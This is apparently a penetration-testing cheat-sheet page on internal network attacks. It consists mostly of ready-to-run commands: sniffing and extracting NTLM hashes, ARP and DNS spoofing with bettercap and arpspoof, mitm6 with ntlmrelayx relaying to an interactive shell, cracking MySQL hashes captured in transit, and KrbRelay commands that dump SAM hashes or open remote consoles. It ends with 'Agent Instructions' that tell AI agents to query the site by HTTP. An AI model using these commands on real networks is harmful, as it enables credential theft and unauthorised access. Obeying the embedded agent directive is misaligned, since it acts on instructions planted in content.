# Network Attacks

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Network Recon

{% content-ref url="/pages/l3OKqtVeA9iyUrXgQ6Dw" %}
[Host Discovery](/0xss0rz/pentest/recon/host-discovery.md)
{% endcontent-ref %}

```
bash find_cidrs.sh eth0
```

{% embed url="<https://github.com/nullenc0de/Internal_Pentest/blob/main/find_cidrs.sh>" %}

### Dismap

{% embed url="<https://github.com/zhzyker/dismap>" %}

### NetScan - From Windows Host

{% embed url="<https://www.softperfect.com/products/networkscanner/>" %}

### [Bettercap](#bettercap-1)

## Sniffing

Wireshark or tcpdump - Credentials in clear text ?&#x20;

```bash
tcpdump -i eth0 -w packets.pcap -s 0
```

{% content-ref url="/pages/QOdfVpgJAKbIdkuowXZ9" %}
[Miscellaneous Techniques](/0xss0rz/pentest/privilege-escalation/linux/miscellaneous-techniques.md)
{% endcontent-ref %}

{% content-ref url="/pages/icl77XpNRA5tQcalZZzc" %}
[Interacting with Users](/0xss0rz/pentest/privilege-escalation/windows/interacting-with-users.md)
{% endcontent-ref %}

### Extract NTLMv1, etc

```
python3 ./Pcredz -f ../NTLMv1.pcapng   
```

### Extract NTLMv2

{% embed url="<https://github.com/mlgualtieri/NTLMRawUnHide>" %}

```
# ./NTLMRawUnHide.py -i ../NTLMv2.pcap
                                                              /%(
                               -= Find NTLMv2 =-          ,@@@@@@@@&
           /%&@@@@&,            -= hashes w/ =-          %@@@@@@@@@@@*
         (@@@@@@@@@@@(       -= NTLMRawUnHide.py =-    *@@@@@@@@@@@@@@@.
        &@@@@@@@@@@@@@@&.                             @@@@@@@@@@@@@@@@@@(
      ,@@@@@@@@@@@@@@@@@@@/                        .%@@@@@@@@@@@@@@@@@@@@@
     /@@@@@@@#&@&*.,/@@@@(.                            ,%@@@@&##(%@@@@@@@@@.
    (@@@@@@@(##(.         .#&@%%(                .&&@@&(            ,/@@@@@@#
   %@@@@@@&*/((.         #(                           ,(@&            ,%@@@@@@*
  @@@@@@@&,/(*                                           ,             .,&@@@@@#
 @@@@@@@/*//,                                                            .,,,**
   .,,  ...
                                    .#@@@@@@@(.
                                   /@@@@@@@@@@@&
                                   .@@@@@@@@@@@*
                                     .(&@@@%/.  ..
                               (@@&     %@@.   .@@@,
                          /@@#          @@@,         %@&
                               &@@&.    @@@/    @@@#
                          .    %@@@(   ,@@@#    @@@(     ,
                         *@@/         .@@@@@(          #@%
                          *@@%.      &@@@@@@@@,      /@@@.
                           .@@@@@@@@@@@&. .*@@@@@@@@@@@/.
                              .%@@@@%,        /%@@@&(.


<-SNIP->

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : DOMAIN 
    > Username               : username 
    > Workstation            : DESKTOP-XXXXXX 

NTLMv2 Hash recovered:
username::DOMAIN:9859cf3a459c3365:2b56<-SNIP->52c21:0101000000000000868e5cd5587fd<-SNIP->ec730634c50a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00320038002e003100330036000000000000000000
```

### NFS Data Extraction

{% embed url="<https://github.com/Rysess/NFSExtractor>" %}

### Finding vulnerabilities - Above

{% embed url="<https://github.com/casterbyte/Above?tab=readme-ov-file#installation>" %}

**Above** is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise in the air. He’s invisible.

<figure><img src="/files/HJZo6XioIuXzbYy9et0t" alt=""><figcaption></figcaption></figure>

### Convert pcapng to pcap

```
tshark -F pcap -r NTLMv2.pcapng -w NTLMv2.pcap
```

## Open outbound ports / Filtering

### Web content filtering&#x20;

For example, try to connect to `4chan` or `exploit-db` with CLI but also with a browser

<figure><img src="/files/KG0FPenj3JOoIieEaPvM" alt=""><figcaption></figcaption></figure>

#### Living Off Trusted Sites

Try to access some of LOTS&#x20;

{% embed url="<https://lots-project.com/>" %}

### Port Filtering

Test for other ports: 22, 21, 23, etc.

{% embed url="<http://portquiz.net/>" %}

<figure><img src="/files/I6FFgb473uQpjy4eS9vF" alt=""><figcaption></figcaption></figure>

```powershell
$ports = @(20, 21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 8080)

$hostname = "portquiz.net"

foreach ($port in $ports) {
    $result = Test-NetConnection -ComputerName $hostname -Port $port -InformationLevel Detailed
    if ($result.TcpTestSucceeded) {
        Write-Output "Port $port is open on $hostname"
    }
}
```

<figure><img src="/files/N0Z0xYn18mgOv0nNLN1e" alt=""><figcaption></figcaption></figure>

### Protocol Filtering

For example, if port 22 is blocked, also test for protocol filtering: SSH on port 443 ?

Server side:

```bash
sudo nano /etc/ssh/sshd_config
# Add or change port
Port 443
# Restart SSH
sudo systemctl restart ssh
# or
sudo service ssh restart
# If nesserary open port 443
sudo ufw allow 443/tcp
```

Try to connect over port 443

```
ssh -p 443 username@server_ip
```

> *The Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)*

## ARP - DNS Spoofing

### Bettercap

Standalone version:&#x20;

```
wget https://github.com/bettercap/bettercap/releases/download/v2.31.1/bettercap_linux_amd64_v2.31.1.zip
```

```
root@box:/tmp# apt install libpcap-dev
root@box:/tmp# apt install libusb-1.0-0
root@box:/tmp#apt install libnetfilter-queue1
root@box:/tmp#apt install iproute2
```

{% embed url="<https://www.stationx.net/bettercap-tutorial/>" %}

```bash
# Host discovery
net.probe on
# See all host
net.show
# ARP spoof
set arp.spoof.targets 192.168.37.133
arp.spoof on
# Spoof the entire subnet /!\ not recommended
set arp.spoof targets
# By default only connections to and from the external network will be spoofed
# Spoof internal connection
set arp.spoof.internal
# Capture data
net.sniff on
# Save the captured packet to pcap
set net.sniff.output filename.pcap
# DNS spoofing
set dns.spoof.domains github.com
dns.spoof.on
```

### Arpspoof

```
$ apt install dsniff
$ apt-get install tcpdump

$ arpspoof -i eth0 -t [IP1] [IP2]
$ arpspoof -i eth0 -t [IP2] [IP1]
$ tcpdump -i eth0 host [IP1] or host [IP2] -w capture.pcap
```

### Eavesarp

Detect and exploit Stale Network Address Configurations (SNACs) via network traffic analysis and ARP poisoning techniques

{% embed url="<https://github.com/ImpostorKeanu/eavesarp-ng>" %}

## LLMNR NBT-NS Poisoning

{% content-ref url="/pages/C3VfH3HrzKTrQ8j6TNyn" %}
[LLMNR NBT-NS Poisoning](/0xss0rz/pentest/internal-pentest/llmnr-nbt-ns-poisoning.md)
{% endcontent-ref %}

## ADIDNS Spoofing

{% content-ref url="/pages/HG3n193tt8EBBwPxo6z0" %}
[ADIDNS Spoofing](/0xss0rz/pentest/internal-pentest/adidns-spoofing.md)
{% endcontent-ref %}

## MITM6

{% embed url="<https://github.com/dirkjanm/mitm6>" %}

{% embed url="<https://cheatsheet.haax.fr/windows-systems/exploitation/ipv6/>" %}

```
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
```

```
ntlmrelayx.py -6 -wh 192.168.1.6 -tf target.txt -socks -debug -smb2support
```

## MITM MySQL

Use [CredSLayer](https://github.com/ShellCode33/CredSLayer) to extract salts and password hash

<figure><img src="/files/ZMAHzzTUyeZG4E6ZSJZd" alt=""><figcaption></figcaption></figure>

{% embed url="<https://fwhibbit.es/crackeando-credenciales-de-mysql-obtenidos-por-un-mitm-like-a-sir>" %}

```
$mysqlna$<Salt1><Salt2>*<password_hash>
```

```
hashcat -a 0 -m 11200 hash.mysql
```

## MITM - ASReproast

{% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %}
[Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endcontent-ref %}

## MITM - Kerberoast

{% content-ref url="/pages/WyP2ypGRBLxj0wkF4CEb" %}
[Kerberoast](/0xss0rz/pentest/internal-pentest/kerberoast.md)
{% endcontent-ref %}

## No LDAP Signing - KrbRelayUp

No-fix local privilege escalation in windows domain environments where **LDAP signing is not enforced** (the default settings).

{% embed url="<https://github.com/Dec0ne/KrbRelayUp>" %}

## KrbRelay

{% embed url="<https://www.r-tec.net/r-tec-blog-windows-is-and-always-will-be-a-potatoland.html>" %}

{% embed url="<https://github.com/cube0x0/KrbRelay>" %}

* Cross-session attack:
  * `KrbRelay.exe -s <SESSION-ID> -clsid 354FF91B-5E49-4BDC-A8E6-1CB6C6877182 -ntlm`
* Read out local SAM database hashes:
  * `KrbRelay.exe -cslid F8842F8E-DAFE-4B37-9D38-4E0714A61149 -session <TARGET-SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -secrets`&#x20;
* Relaying Kerberos to SMB for remote access:
  * `KrbRelay.exe -cslid f8842f8e-dafe-4b37-9d38-4e0714a61149 -session <SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -console`

## NTLM Relay

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

{% content-ref url="/pages/tlQPEp6Q1TbcrBfX9e0v" %}
[AD CS](/0xss0rz/pentest/internal-pentest/ad-cs.md)
{% endcontent-ref %}

## Kerberos Relay

<figure><img src="/files/oIUhv33oGufGx6dfx2aR" alt=""><figcaption><p><a href="https://github.com/CICADA8-Research/Penetration/blob/main/KrbRelay%20MindMap/KrbRelay.drawio.png">https://github.com/CICADA8-Research/Penetration/blob/main/KrbRelay%20MindMap/KrbRelay.drawio.png</a></p></figcaption></figure>

### Over HTTP

{% embed url="<https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with>" %}

### Over SMB

{% embed url="<https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/>" %}

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

{% content-ref url="/pages/tlQPEp6Q1TbcrBfX9e0v" %}
[AD CS](/0xss0rz/pentest/internal-pentest/ad-cs.md)
{% endcontent-ref %}

### Via DHCPv6-DNS-Takeover

<figure><img src="/files/NIg831GpAgOhMfeKectA" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/RedTeamPentesting/pretender>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/network-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.